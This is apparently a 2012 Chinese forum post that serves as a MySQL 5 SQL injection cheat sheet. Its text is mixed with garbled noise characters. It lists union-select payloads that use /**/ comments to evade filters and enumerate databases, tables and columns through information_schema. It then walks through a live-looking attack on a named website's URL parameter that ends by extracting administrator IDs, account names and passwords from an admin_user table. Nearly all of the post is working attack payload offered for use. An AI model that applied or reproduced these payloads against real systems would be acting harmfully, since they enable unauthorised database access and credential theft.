查库
}, O- f8 r0 ]0 b: A( ?. J" @) J! Y( R3 b! y, c, D
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
! d+ y5 q8 o9 k- a9 `
4 h5 S$ s s+ v) u# R. I查表5 V) ?! i+ l1 N3 X9 a+ V
) \0 L# r0 Q) t& z4 h7 W/ l) H0 [id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
- h3 C2 @# b' V1 w* I/ U7 n& x4 l! k2 O/ |
查段; M) L. Q9 M% \# N8 Q8 ^
. K$ G: m- E2 l K6 m7 c/ m1 U
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1$ ^) ?! p% z/ u' E0 v5 |) n( ~
5 W# d/ n+ n9 G2 ]- l7 S( p" o$ `/ d7 g& F
mysql5高级注入方法暴表( T6 Y. l' w# o4 i
, ?( v! X1 W0 k: D0 Z例子如下:6 i, t1 I1 u* X( F
) i% A2 B1 N+ F: z4 N1.爆表
/ x- p0 t5 u4 ]8 Ihttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)2 d& s5 i4 l+ K& ^
这样爆到第4个时出现了admin_user表。
; u& Z% [3 c. R% Y1 Y* w, R4 [
2.暴字段
* ?- r( \8 c4 W$ p3 qhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
" A1 ~' m4 [% R% h5 |. E: J5 \& k
7 u4 T8 Z T1 |' V
3.爆密码
( @* q2 s: z8 p, W( G- m, bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
- Z! I% ^! f; V; `# k% p7 `, D/ b! d" F
- a+ J# d0 j6 ^5 E* x1 a3 |
* }+ T% l( V( F* }7 s( G3 J4 w |
发表于 2012-9-13 16:29:37
收藏
支持
反对